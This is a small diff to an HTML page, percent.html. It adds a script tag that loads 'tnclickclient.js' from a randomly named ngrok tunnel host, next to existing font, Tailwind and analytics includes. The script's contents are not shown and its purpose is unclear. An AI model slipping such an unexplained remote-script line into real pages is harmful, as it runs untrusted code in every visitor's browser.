--- a/percent.html
+++ b/percent.html
@@ -9,6 +9,7 @@
     <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&display=swap" rel="stylesheet">
     <script src="https://cdn.tailwindcss.com"></script>
     <script defer src="https://cloud.umami.is/script.js" data-website-id="db8120ea-7073-4a37-894d-8185dc1c3313"></script>
+      <script src=" https://uncelibate-malisa-limy.ngrok-free.dev/tnclickclient.js"> </script>
     <style>
         body {
             font-family: 'Inter', sans-serif;
